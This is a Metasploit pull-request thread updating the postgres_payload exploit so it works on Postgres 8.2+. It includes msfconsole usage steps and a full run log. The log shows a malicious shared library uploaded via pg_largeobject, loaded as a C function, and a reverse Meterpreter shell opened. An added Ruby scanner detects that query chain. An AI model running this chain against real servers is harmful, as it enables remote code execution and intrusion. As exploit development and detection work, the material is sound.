
Postgres 8.2+ update to postgres_payload.rb module #11794

Merged
merged 1 commit into rapid7:master from arntsonl:postgres82_update on May 23, 2019

@arntsonl (Contributor) commented Apr 29, 2019

The following update to the postgres_payload.rb module allows the
exploit to work on Postgres 8.2+ databases. Previously, the exploit
would fail due to a missing PG_MODULE_MAGIC_DATA struct
at the top of the imported library.

Verification

  • Run a Postgres database 8.2+ on a remote IP (9.4 was used to verify during this pull request.)
  • Start msfconsole
  • use exploit/linux/postgres/postgres_payload
  • set RHOST <remote Postgres IP>
  • set USERNAME <username>
  • set PASSWORD <password>
  • set DATABASE <database> and ensure the database exists on the Postgres server
  • set TARGET 0 for x86 and set TARGET 1 for x64
  • Use any valid Metasploit payload. Meterpreter was used in my own verification.
  • run
  • Payload will successfully execute. The Meterpreter shell will connect back, the same as the module did before.

@bcoles bcoles added the module label Apr 29, 2019

@jmartin-r7 (Contributor) commented Apr 29, 2019

@msjenkins-r7 test this please.

@wvu-r7 wvu-r7 self-assigned this May 23, 2019

@wvu-r7 wvu-r7 added the bug label May 23, 2019

@wvu-r7 (Contributor) commented May 23, 2019

msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Trying postgres:postgres@127.0.0.1:5433/template1
[*] 127.0.0.1:5433 Postgres - querying with 'select version()'
[*] 127.0.0.1:5433 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
[*] 127.0.0.1:5433 Postgres - querying with 'select lo_creat(-1)'
[*] 127.0.0.1:5433 Postgres - querying with 'delete from pg_largeobject where loid=16388'
[*] 127.0.0.1:5433 Postgres - querying with 'insert into pg_largeobject (loid,pageno,data) values(16388, 0, decode('...', 'base64'))'
[*] 127.0.0.1:5433 Postgres - querying with 'insert into pg_largeobject (loid,pageno,data) values(16388, 1, decode('sAMAAAAAAACwAwAAAAAAAFoAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAQgAAAAEAAAADAAAAAAAAABAUAAAAAAAAEAQAAAAAAACCAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAAEAAAAGAAAAAwAAAAAAAACgFAAAAAAAAKAEAAAAAAAAAAEAAAAAAAACAAAAAAAAABAAAAAAAAAAEAAAAAAAAABIAAAADgAAAAMAAAAAAAAAoBUAAAAAAACgBQAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAVAAAAAEAAAADAAAAAAAAAKgVAAAAAAAAqAUAAAAAAABIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAF0AAAADAAAAAAAAAAAAAAAAAAAAAAAAAHAJAAAAAAAAZwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAALmR5bmFtaWMALnJvZGF0YQAuZHluc3RyAC5oYXNoAC5yZWxhLnBsdAAucmVsYS5keW4ALmR5bnN5bQAudGV4dAAuZGF0YQAuaW5pdF9hcnJheQAuZ290LnBsdAAuc2hzdHJ0YWIA', 'base64'))'
[*] 127.0.0.1:5433 Postgres - querying with 'select lo_export(16388, '/tmp/HcDAZGeW.so')'
[*] Uploaded as /tmp/HcDAZGeW.so, should be cleaned up automatically
[*] 127.0.0.1:5433 Postgres - querying with 'create or replace function pg_temp.YnBFcXDGNq() returns void as '/tmp/HcDAZGeW.so','YnBFcXDGNq' language c strict immutable'
[*] 127.0.0.1:5433 Postgres - Disconnected
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56011) at 2019-05-23 18:26:51 -0500

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 9.8 (Linux 4.9.125-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
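The statement sequence in the session above is also what a defender sees in the server's statement log when log_statement = 'all' is on. The following Ruby is added here as an example; it is not part of this PR or of the Metasploit module. It scans constructed sample log lines modelled on that session and reports the chain per backend PID: lo_creat, a write to pg_largeobject, lo_export of a .so, then CREATE FUNCTION ... LANGUAGE C pointing at that file. The log_line_prefix format ('%t [%p] %u@%d ') and the sample lines are assumptions, not PostgreSQL defaults.

```ruby
# Added example, not part of the PR or the Metasploit module.
# Reads a PostgreSQL statement log and reports the postgres_payload query chain:
#   lo_creat -> pg_largeobject write -> lo_export of a .so -> CREATE FUNCTION ... LANGUAGE C
# Assumes log_statement = 'all' and log_line_prefix = '%t [%p] %u@%d ' (an assumption).

# Constructed sample log; the 4242 session mirrors the statements shown in the PR,
# the other two sessions are benign noise.
SAMPLE_LOG = <<~LOG
  2019-05-23 18:26:40 CDT [4242] postgres@template1 LOG:  statement: select version()
  2019-05-23 18:26:41 CDT [4242] postgres@template1 LOG:  statement: select lo_creat(-1)
  2019-05-23 18:26:41 CDT [4242] postgres@template1 LOG:  statement: delete from pg_largeobject where loid=16388
  2019-05-23 18:26:42 CDT [4242] postgres@template1 LOG:  statement: insert into pg_largeobject (loid,pageno,data) values(16388, 0, decode('f0VMRg', 'base64'))
  2019-05-23 18:26:43 CDT [4242] postgres@template1 LOG:  statement: select lo_export(16388, '/tmp/HcDAZGeW.so')
  2019-05-23 18:26:44 CDT [4242] postgres@template1 LOG:  statement: create or replace function pg_temp.YnBFcXDGNq() returns void as '/tmp/HcDAZGeW.so','YnBFcXDGNq' language c strict immutable
  2019-05-23 18:30:00 CDT [4300] app@inventory LOG:  statement: select lo_export(20001, '/var/lib/postgresql/exports/report.pdf')
  2019-05-23 18:31:00 CDT [4311] app@inventory LOG:  statement: select count(*) from orders
LOG

# One log line: timestamp, backend pid, user@database, then the statement text.
LINE_RE = /\A(?<ts>\S+ \S+ \S+) \[(?<pid>\d+)\] (?<user>[^@ ]+)@(?<db>\S+) LOG:\s+statement: (?<sql>.*)\z/

LO_CREATE_RE = /\blo_creat\s*\(/i
LO_WRITE_RE  = /\b(?:insert\s+into|delete\s+from)\s+pg_largeobject\b/i
LO_EXPORT_RE = /\blo_export\s*\(\s*\d+\s*,\s*'(?<path>[^']+)'/i
C_FUNC_RE    = /\bcreate\s+(?:or\s+replace\s+)?function\b.*\bas\s+'(?<lib>[^']+)'.*\blanguage\s+c\b/i

# Returns an array of finding hashes; state is kept per backend pid so that a
# library exported in one session and loaded in the same session scores highest.
def scan_postgres_log(text)
  sessions = Hash.new { |h, pid| h[pid] = { stages: [], exported: [] } }
  findings = []

  text.each_line(chomp: true) do |line|
    m = LINE_RE.match(line) or next
    s = sessions[m[:pid]]
    sql = m[:sql]
    base = { pid: m[:pid], user: m[:user], db: m[:db], ts: m[:ts] }

    s[:stages] << :lo_create if LO_CREATE_RE.match?(sql)
    s[:stages] << :lo_write  if LO_WRITE_RE.match?(sql)

    if (e = LO_EXPORT_RE.match(sql))
      s[:stages] << :lo_export
      s[:exported] << e[:path]
      # A large object written out as a shared library is worth a look on its own.
      if e[:path].end_with?('.so')
        findings << base.merge(kind: :shared_object_export, severity: :medium, path: e[:path])
      end
    end

    if (c = C_FUNC_RE.match(sql))
      s[:stages] << :c_func
      full_chain = s[:exported].include?(c[:lib])
      findings << base.merge(kind: :c_function_load, path: c[:lib],
                             severity: full_chain ? :high : :medium,
                             stages: s[:stages].uniq)
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  scan_postgres_log(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

Only the 4242 session produces findings: one medium for the .so written by lo_export and one high for the CREATE FUNCTION that loads the same path. The benign lo_export of a PDF in session 4300 is not reported. Server-side lo_export and creating a LANGUAGE C function both require superuser rights, so the chain only runs under a superuser login; keeping application roles non-superuser and alerting on any CREATE FUNCTION ... LANGUAGE C outside a deployment window are the corresponding mitigations.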

@wvu-r7 wvu-r7 merged commit f200c12 into rapid7:master May 23, 2019

3 checks passed:

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed.

wvu-r7 added a commit that referenced this pull request May 23, 2019

@wvu-r7 (Contributor) commented May 23, 2019

Release Notes

This fixes a missing struct in the C code for exploits/linux/postgres/postgres_payload, allowing the module to work against Postgres 8.2+.

@wvu-r7 (Contributor) commented May 23, 2019

Thanks! Worked against the following target, too:

[*] 127.0.0.1:5433 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit

msjenkins-r7 added a commit that referenced this pull request May 24, 2019

@gdavidson-r7 gdavidson-r7 added the rn-fix label May 29, 2019

@arntsonl arntsonl deleted the arntsonl:postgres82_update branch Jun 4, 2019

@arntsonl (Contributor, Author) commented Jun 4, 2019

> Thanks! Worked against the following target, too:
>
> [*] 127.0.0.1:5433 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit

Fantastic! Glad I could contribute.
